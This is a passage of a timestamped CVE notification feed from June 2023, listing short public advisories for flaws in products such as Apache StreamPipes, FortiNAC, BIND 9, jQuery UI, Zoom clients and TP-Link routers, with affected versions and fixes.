| 2023-06-23 11:58:21 |
🚨 CVE-2023-31469A REST interface in Apache StreamPipes (versions 0.69.0 to 0.91.0) was not properly restricted to admin-only access. This allowed a non-admin user with valid login credentials to elevate privileges beyond the initially assigned roles.The issue is resolved by upgrading to StreamPipes 0.92.0.🎖@cveNotify |
|
| 2023-06-23 11:58:20 |
🚨 CVE-2023-32463Dell VxRail, version(s) 8.0.100 and earlier contain a denial-of-service vulnerability in the upgrade functionality. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to degraded performance and system malfunction.🎖@cveNotify |
|
| 2023-06-23 11:58:19 |
🚨 CVE-2023-32464Dell VxRail, versions prior to 7.0.450, contain an improper certificate validation vulnerability. A high privileged remote attacker may potentially exploit this vulnerability to carry out a man-in-the-middle attack by supplying a crafted certificate and intercepting the victim's traffic to view or modify a victim’s data in transit.🎖@cveNotify |
|
| 2023-06-23 11:58:18 |
🚨 CVE-2023-33299A deserialization of untrusted data in Fortinet FortiNAC below 7.2.1, below 9.4.3, below 9.2.8 and all earlier versions of 8.x allows attacker to execute unauthorized code or commands via specifically crafted request on inter-server communication port. Note FortiNAC versions 8.x will not be fixed.🎖@cveNotify |
|
| 2023-06-23 11:58:17 |
🚨 CVE-2023-28043Dell SCG 5.14 contains an information disclosure vulnerability during the SRS to SCG upgrade path. A remote low privileged malicious user could potentially exploit this vulnerability to retrieve the plain text.🎖@cveNotify |
|
| 2023-06-23 11:58:16 |
🚨 CVE-2023-23344A permission issue in BigFix WebUI Insights site version 14 allows an authenticated, unprivileged operator to access an administrator page.🎖@cveNotify |
|
| 2023-06-23 11:58:15 |
🚨 CVE-2023-35801A directory traversal vulnerability in Safe Software FME Server before 2022.2.5 allows an attacker to bypass validation when editing a network-based resource connection, resulting in the unauthorized reading and writing of arbitrary files. Successful exploitation requires an attacker to have access to a user account with write privileges. FME Flow 2023.0 is also a fixed version.🎖@cveNotify |
|
| 2023-06-23 11:58:14 |
🚨 CVE-2023-35042** DISPUTED ** GeoServer 2, in some configurations, allows remote attackers to execute arbitrary code via java.lang.Runtime.getRuntime().exec in wps:LiteralData within a wps:Execute request, as exploited in the wild in June 2023. NOTE: the vendor states that they are unable to reproduce this in any version.🎖@cveNotify |
|
| 2023-06-23 05:58:25 |
🚨 CVE-2023-30631Improper Input Validation vulnerability in Apache Software Foundation Apache Traffic Server. The configuration option proxy.config.http.push_method_enabled didn't function. However, by default the PUSH method is blocked in the ip_allow configuration file.This issue affects Apache Traffic Server: from 8.0.0 through 9.2.0.8.x users should upgrade to 8.1.7 or later versions9.x users should upgrade to 9.2.1 or later versions🎖@cveNotify |
|
| 2023-06-23 05:58:24 |
🚨 CVE-2023-33141Yet Another Reverse Proxy (YARP) Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-06-23 05:58:20 |
🚨 CVE-2023-36192Sngrep v1.6.0 was discovered to contain a heap buffer overflow via the function capture_ws_check_packet at /src/capture.c.🎖@cveNotify |
|
| 2023-06-23 05:58:19 |
🚨 CVE-2023-33140Microsoft OneNote Spoofing Vulnerability🎖@cveNotify |
|
| 2023-06-23 05:58:18 |
🚨 CVE-2023-33620GL.iNET GL-AR750S-Ext firmware v3.215 uses an insecure protocol in its communications which allows attackers to eavesdrop via a man-in-the-middle attack.🎖@cveNotify |
|
| 2023-06-23 05:58:14 |
🚨 CVE-2023-32061Discourse is an open source discussion platform. Prior to version 3.0.4 of the `stable` branch and version 3.1.0.beta5 of the `beta` and `tests-passed` branches, the lack of restrictions on the iFrame tag makes it easy for an attacker to exploit the vulnerability and hide subsequent comments from other users. This issue is patched in version 3.0.4 of the `stable` branch and version 3.1.0.beta5 of the `beta` and `tests-passed` branches. There are no known workarounds.🎖@cveNotify |
|
| 2023-06-23 05:58:13 |
🚨 CVE-2019-6706Lua 5.3.5 has a use-after-free in lua_upvaluejoin in lapi.c. For example, a crash outcome might be achieved by an attacker who is able to trigger a debug.upvaluejoin call in which the arguments have certain relationships.🎖@cveNotify |
|
| 2023-06-23 05:58:12 |
🚨 CVE-2020-24370ldebug.c in Lua 5.4.0 allows a negation overflow and segmentation fault in getlocal and setlocal, as demonstrated by getlocal(3,2^31).🎖@cveNotify |
|
| 2023-06-23 01:58:18 |
🚨 CVE-2023-28006The OSD Bare Metal Server uses a cryptographic algorithm that is no longer considered sufficiently secure.🎖@cveNotify |
|
| 2023-06-23 01:58:17 |
🚨 CVE-2023-34241OpenPrinting CUPS is a standards-based, open source printing system for Linux and other Unix-like operating systems. Starting in version 2.0.0 and prior to version 2.4.6, CUPS logs data of free memory to the logging service AFTER the connection has been closed, when it should have logged the data right before. This is a use-after-free bug that impacts the entire cupsd process.The exact cause of this issue is the function `httpClose(con->http)` being called in `scheduler/client.c`. The problem is that httpClose always, provided its argument is not null, frees the pointer at the end of the call, only for cupsdLogClient to pass the pointer to httpGetHostname. This issue happens in function `cupsdAcceptClient` if LogLevel is warn or higher and in two scenarios: there is a double-lookup for the IP Address (HostNameLookups Double is set in `cupsd.conf`) which fails to resolve, or if CUPS is compiled with TCP wrappers and the connection is refused by rules from `/etc/hosts.allow` and `/etc/hosts.deny`.Version 2.4.6 has a patch for this issue.🎖@cveNotify |
|
| 2023-06-23 01:58:13 |
🚨 CVE-2023-28016Host Header Injection vulnerability in the HCL BigFix OSD Bare Metal Server version 311.12 or lower allows attacker to supply invalid input to cause the OSD Bare Metal Server to perform a redirect to an attacker-controlled domain.🎖@cveNotify |
|
| 2023-06-23 01:58:12 |
🚨 CVE-2023-34645jfinal CMS 5.1.0 has an arbitrary file read vulnerability.🎖@cveNotify |
|
| 2023-06-22 22:58:18 |
🚨 CVE-2023-29337NuGet Client Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-22 22:58:17 |
🚨 CVE-2023-28800When using local accounts for administration, the redirect url parameter was not encoded correctly, allowing for an XSS attack providing admin login.🎖@cveNotify |
|
| 2023-06-22 22:58:14 |
🚨 CVE-2023-36354TP-Link TL-WR940N V4, TL-WR841N V8/V10, TL-WR740N V1/V2, TL-WR940N V2/V3, and TL-WR941ND V5/V6 were discovered to contain a buffer overflow in the component /userRpm/AccessCtrlTimeSchedRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request.🎖@cveNotify |
|
| 2023-06-22 22:58:13 |
🚨 CVE-2023-2990Fortra Globalscape EFT versions before 8.1.0.16 suffer from a denial of service vulnerability, where a compressed message that decompresses to itself can cause infinite recursion and crash the service🎖@cveNotify |
|
| 2023-06-22 22:58:12 |
🚨 CVE-2023-36355TP-Link TL-WR940N V4 was discovered to contain a buffer overflow via the ipStart parameter at /userRpm/WanDynamicIpV6CfgRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request.🎖@cveNotify |
|
| 2023-06-22 20:58:37 |
🚨 CVE-2023-0837An improper authorization check of local device settings in TeamViewer Remote between version 15.41 and 15.42.7 for Windows and macOS allows an unprivileged user to change basic local device settings even though the options were locked. This can result in unwanted changes to the configuration.🎖@cveNotify |
|
| 2023-06-22 20:58:35 |
🚨 CVE-2023-21131In checkKeyIntentParceledCorrectly() of ActivityManagerService.java, there is a possible bypass of Parcel Mismatch mitigations due to a logic error in the code. This could lead to local escalation of privilege and the ability to launch arbitrary activities in settings with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-265015796🎖@cveNotify |
|
| 2023-06-22 20:58:34 |
🚨 CVE-2023-21135In onCreate of NotificationAccessSettings.java, there is a possible failure to persist notifications settings due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-260570119🎖@cveNotify |
|
| 2023-06-22 20:58:32 |
🚨 CVE-2021-0701Product: AndroidVersions: Android SoCAndroid ID: A-277775870🎖@cveNotify |
|
| 2023-06-22 20:58:31 |
🚨 CVE-2021-0945Product: AndroidVersions: Android SoCAndroid ID: A-278156680🎖@cveNotify |
|
| 2023-06-22 20:58:29 |
🚨 CVE-2023-34796Cross site scripting (XSS) vulnerabiliy in dmarcts-report-viewer dashboard versions 1.1 and thru commit 8a1d882b4c481a05e296e9b38a7961e912146a0f, allows unauthenticated attackers to execute arbitrary code via the org_name or domain values.🎖@cveNotify |
|
| 2023-06-22 20:58:28 |
🚨 CVE-2023-34923XML Signature Wrapping (XSW) in SAML-based Single Sign-on feature in TOPdesk v12.10.12 allows bad actors with credentials to authenticate with the Identity Provider (IP) to impersonate any TOPdesk user via SAML Response manipulation.🎖@cveNotify |
|
| 2023-06-22 20:58:26 |
🚨 CVE-2023-36239libming listswf 0.4.7 was discovered to contain a buffer overflow in the parseSWF_DEFINEFONTINFO() function at parser.c.🎖@cveNotify |
|
| 2023-06-22 20:58:25 |
🚨 CVE-2023-36243FLVMeta v1.2.1 was discovered to contain a buffer overflow via the xml_on_metadata_tag_only function at dump_xml.c.🎖@cveNotify |
|
| 2023-06-22 20:58:24 |
🚨 CVE-2023-31541A unrestricted file upload vulnerability was discovered in the ‘Browse and upload images’ feature of the CKEditor v1.2.3 plugin for Redmine, which allows arbitrary files to be uploaded to the server.🎖@cveNotify |
|
| 2023-06-22 20:58:22 |
🚨 CVE-2021-25321A UNIX Symbolic Link (Symlink) Following vulnerability in arpwatch of SUSE Linux Enterprise Server 11-SP4-LTSS, SUSE Manager Server 4.0, SUSE OpenStack Cloud Crowbar 9; openSUSE Factory, Leap 15.2 allows local attackers with control of the runtime user to run arpwatch as to escalate to root upon the next restart of arpwatch. This issue affects: SUSE Linux Enterprise Server 11-SP4-LTSS arpwatch versions prior to 2.1a15. SUSE Manager Server 4.0 arpwatch versions prior to 2.1a15. SUSE OpenStack Cloud Crowbar 9 arpwatch versions prior to 2.1a15. openSUSE Factory arpwatch version 2.1a15-169.5 and prior versions. openSUSE Leap 15.2 arpwatch version 2.1a15-lp152.5.5 and prior versions.🎖@cveNotify |
|
| 2023-06-22 20:58:21 |
🚨 CVE-2022-31251A Incorrect Default Permissions vulnerability in the packaging of the slurm testsuite of openSUSE Factory allows local attackers with control over the slurm user to escalate to root. This issue affects: openSUSE Factory slurm versions prior to 22.05.2-3.3.🎖@cveNotify |
|
| 2023-06-22 20:58:19 |
🚨 CVE-2021-25322A UNIX Symbolic Link (Symlink) Following vulnerability in python-HyperKitty of openSUSE Leap 15.2, Factory allows local attackers to escalate privileges from the user hyperkitty or hyperkitty-admin to root. This issue affects: openSUSE Leap 15.2 python-HyperKitty version 1.3.2-lp152.2.3.1 and prior versions. openSUSE Factory python-HyperKitty versions prior to 1.3.4-5.1.🎖@cveNotify |
|
| 2023-06-22 20:58:18 |
🚨 CVE-2023-31975yasm v1.3.0 was discovered to contain a memory leak via the function yasm_intnum_copy at /libyasm/intnum.c.🎖@cveNotify |
|
| 2023-06-22 20:58:17 |
🚨 CVE-2023-2569A CWE-787: Out-of-Bounds Write vulnerability exists that could cause local denial-of-service,elevation of privilege, and potentially kernel execution when a malicious actor with local useraccess crafts a script/program using an IOCTL call in the Foxboro.sys driver.🎖@cveNotify |
|
| 2023-06-22 20:58:16 |
🚨 CVE-2023-3233A vulnerability was found in Zhong Bang CRMEB up to 4.6.0. It has been classified as critical. Affected is the function get_image_base64 of the file api/controller/v1/PublicController.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231504. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-06-22 18:58:24 |
🚨 CVE-2023-32018Windows Hello Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-22 18:58:23 |
🚨 CVE-2021-4342Over 70 plugins and themes were vulnerable to Cross-Site Request Forgery due to improperly implemented nonce protection that could be bypassed.🎖@cveNotify |
|
| 2023-06-22 16:58:22 |
🚨 CVE-2023-36097funadmin v3.3.2 and v3.3.3 are vulnerable to Insecure file upload via the plugins install.🎖@cveNotify |
|
| 2023-06-22 16:58:21 |
🚨 CVE-2023-26428Attackers can successfully request arbitrary snippet IDs, including E-Mail signatures of other users within the same context. Signatures of other users could be read even though they are not explicitly shared. We improved permission handling when requesting snippets that are not explicitly shared with other users. No publicly available exploits are known.🎖@cveNotify |
|
| 2023-06-22 16:58:20 |
🚨 CVE-2023-26429Control characters were not removed when exporting user feedback content. This allowed attackers to include unexpected content via user feedback and potentially break the exported data structure. We now drop all control characters that are not whitespace character during the export. No publicly available exploits are known.🎖@cveNotify |
|
| 2023-06-22 15:58:11 |
🚨 CVE-2023-20895The VMware vCenter Server contains a memory corruption vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger a memory corruption vulnerability which may bypass authentication.🎖@cveNotify |
|
| 2023-06-22 10:58:19 |
🚨 CVE-2023-25940Dell PowerScale OneFS version 9.5.0.0 contains improper link resolution before file access vulnerability in isi_gather_info. A high privileged local attacker could potentially exploit this vulnerability, leading to system takeover and it breaks the compliance mode guarantees.🎖@cveNotify |
|
| 2023-06-22 10:58:18 |
🚨 CVE-2023-26115All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable.🎖@cveNotify |
|
| 2023-06-22 05:58:35 |
🚨 CVE-2023-30631Improper Input Validation vulnerability in Apache Software Foundation Apache Traffic Server. The configuration option proxy.config.http.push_method_enabled didn't function. However, by default the PUSH method is blocked in the ip_allow configuration file.This issue affects Apache Traffic Server: from 8.0.0 through 9.2.0.8.x users should upgrade to 8.1.7 or later versions9.x users should upgrade to 9.2.1 or later versions🎖@cveNotify |
|
| 2023-06-22 05:58:34 |
🚨 CVE-2019-25152The Abandoned Cart Lite for WooCommerce and Abandoned Cart Pro for WooCommerce plugins for WordPress are vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 5.1.3 and 7.12.0 respectively, due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in user input that will execute on the admin dashboard.🎖@cveNotify |
|
| 2023-06-22 05:58:33 |
🚨 CVE-2023-33842IBM SPSS Modeler on Windows 17.0, 18.0, 18.2.2, 18.3, 18.4, and 18.5 requires the end user to have access to the server SSL key which could allow a local user to decrypt and obtain sensitive information. IBM X-Force ID: 256117.🎖@cveNotify |
|
| 2023-06-22 05:58:29 |
🚨 CVE-2021-3468A flaw was found in avahi in versions 0.6 up to 0.8. The event used to signal the termination of the client connection on the avahi Unix socket is not correctly handled in the client_work function, allowing a local attacker to trigger an infinite loop. The highest threat from this vulnerability is to the availability of the avahi service, which becomes unresponsive after this flaw is triggered.🎖@cveNotify |
|
| 2023-06-22 05:58:28 |
🚨 CVE-2023-31198OS command injection vulnerability exists in Wi-Fi AP UNIT allows. If this vulnerability is exploited, a remote authenticated attacker with an administrative privilege to execute an arbitrary OS command. Affected products and versions are as follows: AC-PD-WAPU v1.05_B04 and earlier, AC-PD-WAPUM v1.05_B04 and earlier, AC-PD-WAPU-P v1.05_B04P and earlier, AC-PD-WAPUM-P v1.05_B04P and earlier, AC-WAPU-300 v1.00_B07 and earlier, AC-WAPUM-300 v1.00_B07 and earlier, AC-WAPU-300-P v1.00_B07 and earlier, and AC-WAPUM-300-P v1.00_B07 and earlier🎖@cveNotify |
|
| 2023-06-22 05:58:27 |
🚨 CVE-2023-34940** UNSUPPORTED WHEN ASSIGNED ** Asus RT-N10LX Router v2.0.0.39 was discovered to contain a stack overflow via the url parameter at /start-apply.html. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-06-22 05:58:23 |
🚨 CVE-2023-26427Default permissions for a properties file were too permissive. Local system users could read potentially sensitive information. We updated the default permissions for noreply.properties set during package installation. No publicly available exploits are known.🎖@cveNotify |
|
| 2023-06-22 05:58:22 |
🚨 CVE-2023-26429Control characters were not removed when exporting user feedback content. This allowed attackers to include unexpected content via user feedback and potentially break the exported data structure. We now drop all control characters that are not whitespace character during the export. No publicly available exploits are known.🎖@cveNotify |
|
| 2023-06-22 05:58:21 |
🚨 CVE-2023-26431IPv4-mapped IPv6 addresses did not get recognized as "local" by the code and a connection attempt is made. Attackers with access to user accounts could use this to bypass existing deny-list functionality and trigger requests to restricted network infrastructure to gain insight about topology and running services. We now respect possible IPV4-mapped IPv6 addresses when checking if contained in a deny-list. No publicly available exploits are known.🎖@cveNotify |
|
| 2023-06-22 05:58:18 |
🚨 CVE-2023-26432When adding an external mail account, processing of SMTP "capabilities" responses are not limited to plausible sizes. Attacker with access to a rogue SMTP service could trigger requests that lead to excessive resource usage and eventually service unavailability. We now limit accepted SMTP server response to reasonable length/size. No publicly available exploits are known.🎖@cveNotify |
|
| 2023-06-22 05:58:17 |
🚨 CVE-2023-26435It was possible to call filesystem and network references using the local LibreOffice instance using manipulated ODT documents. Attackers could discover restricted network topology and services as well as including local files with read permissions of the open-xchange system user. This was limited to specific file-types, like images. We have improved existing content filters and validators to avoid including any local resources. No publicly available exploits are known.🎖@cveNotify |
|
| 2023-06-22 05:58:16 |
🚨 CVE-2023-26436Attackers with access to the "documentconverterws" API were able to inject serialized Java objects, that were not properly checked during deserialization. Access to this API endpoint is restricted to local networks by default. Arbitrary code could be injected that is being executed when processing the request. A check has been introduced to restrict processing of legal and expected classes for this API. We now log a warning in case there are attempts to inject illegal classes. No publicly available exploits are known.🎖@cveNotify |
|
| 2023-06-22 00:58:14 |
🚨 CVE-2023-33476ReadyMedia (MiniDLNA) versions from 1.1.15 up to 1.3.2 is vulnerable to Buffer Overflow. The vulnerability is caused by incorrect validation logic when handling HTTP requests using chunked transport encoding. This results in other code later using attacker-controlled chunk values that exceed the length of the allocated buffer, resulting in out-of-bounds read/write.🎖@cveNotify |
|
| 2023-06-21 22:58:34 |
🚨 CVE-2023-2570A CWE-129: Improper Validation of Array Index vulnerability exists that could cause localdenial-of-service, and potentially kernel execution when a malicious actor with local user accesscrafts a script/program using an unpredictable index to an IOCTL call in the Foxboro.sys driver.🎖@cveNotify |
|
| 2023-06-21 22:58:33 |
🚨 CVE-2023-27836TP-Link TL-WPA8630P (US)_ V2_ Version 171011 was discovered to contain a command injection vulnerability via the devicePwd parameter in the function sub_ 40A80C.🎖@cveNotify |
|
| 2023-06-21 22:58:32 |
🚨 CVE-2017-17712The raw_sendmsg() function in net/ipv4/raw.c in the Linux kernel through 4.14.6 has a race condition in inet->hdrincl that leads to uninitialized stack pointer usage; this allows a local user to execute code and gain privileges.🎖@cveNotify |
|
| 2023-06-21 22:58:28 |
🚨 CVE-2017-15265Race condition in the ALSA subsystem in the Linux kernel before 4.13.8 allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted /dev/snd/seq ioctl calls, related to sound/core/seq/seq_clientmgr.c and sound/core/seq/seq_ports.c.🎖@cveNotify |
|
| 2023-06-21 22:58:27 |
🚨 CVE-2017-12146The driver_override implementation in drivers/base/platform.c in the Linux kernel before 4.12.1 allows local users to gain privileges by leveraging a race condition between a read operation and a store operation that involve different overrides.🎖@cveNotify |
|
| 2023-06-21 22:58:26 |
🚨 CVE-2023-3235A vulnerability was found in mccms up to 2.6.5. It has been rated as critical. Affected by this issue is the function pic_api of the file sys/apps/controllers/admin/Comic.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-231506 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-21 22:58:22 |
🚨 CVE-2023-34113Insufficient verification of data authenticity in Zoom for Windows clients before 5.14.0 may allow an authenticated user to potentially enable an escalation of privilege via network access.🎖@cveNotify |
|
| 2023-06-21 22:58:21 |
🚨 CVE-2023-34121 Improper input validation in the Zoom for Windows, Zoom Rooms, Zoom VDI Windows Meeting clients before 5.14.0 may allow an authenticated user to potentially enable an escalation of privilege via network access.🎖@cveNotify |
|
| 2023-06-21 22:58:20 |
🚨 CVE-2023-28601Zoom for Windows clients prior to 5.14.0 contain an improper restriction of operations within the bounds of a memory buffer vulnerability. A malicious user may alter protected Zoom Client memory buffer potentially causing integrity issues within the Zoom Client.🎖@cveNotify |
|
| 2023-06-21 22:58:16 |
🚨 CVE-2023-3236A vulnerability classified as critical has been found in mccms up to 2.6.5. This affects the function pic_save of the file sys/apps/controllers/admin/Comic.php. The manipulation of the argument pic leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231507.🎖@cveNotify |
|
| 2023-06-21 22:58:15 |
🚨 CVE-2023-28599Zoom clients prior to 5.13.10 contain an HTML injection vulnerability. A malicious user could inject HTML into their display name potentially leading a victim to a malicious website during meeting creation.🎖@cveNotify |
|
| 2023-06-21 22:58:14 |
🚨 CVE-2023-24937Windows CryptoAPI Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-06-21 20:58:39 |
🚨 CVE-2023-30082A denial of service attack might be launched against the server if an unusually lengthy password (more than 10000000 characters) is supplied using the osTicket application. This can cause the website to go down or stop responding. When a long password is entered, this procedure will consume all available CPU and memory.🎖@cveNotify |
|
| 2023-06-21 20:58:38 |
🚨 CVE-2023-3231A vulnerability has been found in UJCMS up to 6.0.2 and classified as problematic. This vulnerability affects unknown code of the component ZIP Package Handler. The manipulation of the argument dir leads to information disclosure. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 7.0.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-231502 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-21 20:58:37 |
🚨 CVE-2023-2603A vulnerability was found in libcap. This issue occurs in the _libcap_strdup() function and can lead to an integer overflow if the input string is close to 4GiB.🎖@cveNotify |
|
| 2023-06-21 20:58:36 |
🚨 CVE-2023-27243An access control issue in Makves DCAP v3.0.0.122 allows unauthenticated attackers to obtain cleartext credentials via a crafted web request to the product API.🎖@cveNotify |
|
| 2023-06-21 20:58:35 |
🚨 CVE-2023-33725Broadleaf 5.x and 6.x (including 5.2.25-GA and 6.2.6-GA) was discovered to contain a cross-site scripting (XSS) vulnerability via a customer signup with a crafted email address. This is fixed in 6.2.6.1-GA.🎖@cveNotify |
|
| 2023-06-21 20:58:34 |
🚨 CVE-2023-0026An Improper Input Validation vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). When a BGP update message is received over an established BGP session, and that message contains a specific, optional transitive attribute, this session will be torn down with an update message error. This issue cannot propagate beyond an affected system as the processing error occurs as soon as the update is received. This issue is exploitable remotely as the respective attribute can propagate through unaffected systems and intermediate AS (if any). Continuous receipt of a BGP update containing this attribute will create a sustained Denial of Service (DoS) condition. Some customers have experienced these BGP session flaps which prompted Juniper SIRT to release this advisory out of cycle before fixed releases are widely available as there is an effective workaround. This issue affects: Juniper Networks Junos OS 15.1R1 and later versions prior to 20.4R3-S8; 21.1 version 21.1R1 and later versions prior to 21.2R3-S6; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S4; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.2R3-S2; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.1 versions prior to 23.1R1-S1, 23.1R2. Juniper Networks Junos OS Evolved All versions prior to 20.4R3-S8-EVO; 21.1 version 21.1R1-EVO and later versions prior to 21.2R3-S6-EVO; 21.3 versions prior to 21.3R3-S5-EVO; 21.4 versions prior to 21.4R3-S4-EVO; 22.1 versions prior to 22.1R3-S4-EVO; 22.2 versions prior to 22.2R3-S2-EVO; 22.3 versions prior to 22.3R2-S2-EVO, 22.3R3-S1-EVO; 22.4 versions prior to 22.4R2-S1-EVO, 22.4R3-EVO; 23.1 versions prior to 23.1R1-S1-EVO, 23.1R2-EVO.🎖@cveNotify |
|
| 2023-06-21 20:58:33 |
🚨 CVE-2023-2828Every `named` instance configured to run as a recursive resolver maintains a cache database holding the responses to the queries it has recently sent to authoritative servers. The size limit for that cache database can be configured using the `max-cache-size` statement in the configuration file; it defaults to 90% of the total amount of memory available on the host. When the size of the cache reaches 7/8 of the configured limit, a cache-cleaning algorithm starts to remove expired and/or least-recently used RRsets from the cache, to keep memory use below the configured limit.It has been discovered that the effectiveness of the cache-cleaning algorithm used in `named` can be severely diminished by querying the resolver for specific RRsets in a certain order, effectively allowing the configured `max-cache-size` limit to be significantly exceeded.This issue affects BIND 9 versions 9.11.0 through 9.16.41, 9.18.0 through 9.18.15, 9.19.0 through 9.19.13, 9.11.3-S1 through 9.16.41-S1, and 9.18.11-S1 through 9.18.15-S1.🎖@cveNotify |
|
| 2023-06-21 20:58:32 |
🚨 CVE-2023-2829A `named` instance configured to run as a DNSSEC-validating recursive resolver with the Aggressive Use of DNSSEC-Validated Cache (RFC 8198) option (`synth-from-dnssec`) enabled can be remotely terminated using a zone with a malformed NSEC record.This issue affects BIND 9 versions 9.16.8-S1 through 9.16.41-S1 and 9.18.11-S1 through 9.18.15-S1.🎖@cveNotify |
|
| 2023-06-21 20:58:31 |
🚨 CVE-2023-2911If the `recursive-clients` quota is reached on a BIND 9 resolver configured with both `stale-answer-enable yes;` and `stale-answer-client-timeout 0;`, a sequence of serve-stale-related lookups could cause `named` to loop and terminate unexpectedly due to a stack overflow.This issue affects BIND 9 versions 9.16.33 through 9.16.41, 9.18.7 through 9.18.15, 9.16.33-S1 through 9.16.41-S1, and 9.18.11-S1 through 9.18.15-S1.🎖@cveNotify |
|
| 2023-06-21 20:58:29 |
🚨 CVE-2023-29160Stack-based buffer overflow vulnerability exists in FRENIC RHC Loader v1.1.0.3. If a user opens a specially crafted FNE file, sensitive information on the system where the affected product is installed may be disclosed or arbitrary code may be executed.🎖@cveNotify |
|
| 2023-06-21 20:58:28 |
🚨 CVE-2023-32014Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-21 20:58:27 |
🚨 CVE-2023-32016Windows Installer Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-06-21 20:58:26 |
🚨 CVE-2023-32017Microsoft PostScript Printer Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-21 20:58:25 |
🚨 CVE-2023-34245@udecode/plate-link is the link handler for the udecode/plate rich-text editor plugin system for Slate & React. Affected versions of the link plugin and link UI component do not sanitize URLs to prevent use of the `javascript:` scheme. As a result, links with JavaScript URLs can be inserted into the Plate editor through various means, including opening or pasting malicious content. `@udecode/plate-link` 20.0.0 resolves this issue by introducing an `allowedSchemes` option to the link plugin, defaulting to `['http', 'https', 'mailto', 'tel']`. URLs using a scheme that isn't in this list will not be rendered to the DOM. Users are advised to upgrade. Users unable to upgrade are advised to override the `LinkElement` and `PlateFloatingLink` components with implementations that explicitly check the URL scheme before rendering any anchor elements.🎖@cveNotify |
|
| 2023-06-21 20:58:24 |
🚨 CVE-2021-41182jQuery-UI is the official jQuery user interface library. Prior to version 1.13.0, accepting the value of the `altField` option of the Datepicker widget from untrusted sources may execute untrusted code. The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `altField` option is now treated as a CSS selector. A workaround is to not accept the value of the `altField` option from untrusted sources.🎖@cveNotify |
|
| 2023-06-21 20:58:20 |
🚨 CVE-2021-41184jQuery-UI is the official jQuery user interface library. Prior to version 1.13.0, accepting the value of the `of` option of the `.position()` util from untrusted sources may execute untrusted code. The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `of` option is now treated as a CSS selector. A workaround is to not accept the value of the `of` option from untrusted sources.🎖@cveNotify |
|
| 2023-06-21 20:58:19 |
🚨 CVE-2017-18202The __oom_reap_task_mm function in mm/oom_kill.c in the Linux kernel before 4.14.4 mishandles gather operations, which allows attackers to cause a denial of service (TLB entry leak or use-after-free) or possibly have unspecified other impact by triggering a copy_to_user call within a certain time window.🎖@cveNotify |
|
| 2023-06-21 20:58:18 |
🚨 CVE-2010-5312Cross-site scripting (XSS) vulnerability in jquery.ui.dialog.js in the Dialog widget in jQuery UI before 1.10.0 allows remote attackers to inject arbitrary web script or HTML via the title option.🎖@cveNotify |
|
| 2023-06-21 20:58:17 |
🚨 CVE-2023-31195ASUS Router RT-AX3000 Firmware versions prior to 3.0.0.4.388.23403 uses sensitive cookies without 'Secure' attribute. When an attacker is in a position to be able to mount a man-in-the-middle attack, and a user is tricked to log into the affected device through an unencrypted ('http') connection, the user's session may be hijacked.🎖@cveNotify |
|
| 2023-06-21 20:58:16 |
🚨 CVE-2021-41183jQuery-UI is the official jQuery user interface library. Prior to version 1.13.0, accepting the value of various `*Text` options of the Datepicker widget from untrusted sources may execute untrusted code. The issue is fixed in jQuery UI 1.13.0. The values passed to various `*Text` options are now always treated as pure text, not HTML. A workaround is to not accept the value of the `*Text` options from untrusted sources.🎖@cveNotify |
|
| 2023-06-21 18:58:37 |
🚨 CVE-2023-3218Race Condition within a Thread in GitHub repository it-novum/openitcockpit prior to 4.6.5.🎖@cveNotify |
|
| 2023-06-21 18:58:36 |
🚨 CVE-2023-2961A segmentation fault flaw was found in the Advancecomp package. This may lead to decreased availability.🎖@cveNotify |
|
| 2023-06-21 18:58:35 |
🚨 CVE-2016-7103Cross-site scripting (XSS) vulnerability in jQuery UI before 1.12.0 might allow remote attackers to inject arbitrary web script or HTML via the closeText parameter of the dialog function.🎖@cveNotify |
|
| 2023-06-21 18:58:34 |
🚨 CVE-2023-29167Out-of-bound reads vulnerability exists in FRENIC RHC Loader v1.1.0.3. If a user opens a specially crafted FNE file, sensitive information on the system where the affected product is installed may be disclosed or arbitrary code may be executed.🎖@cveNotify |
|
| 2023-06-21 18:58:33 |
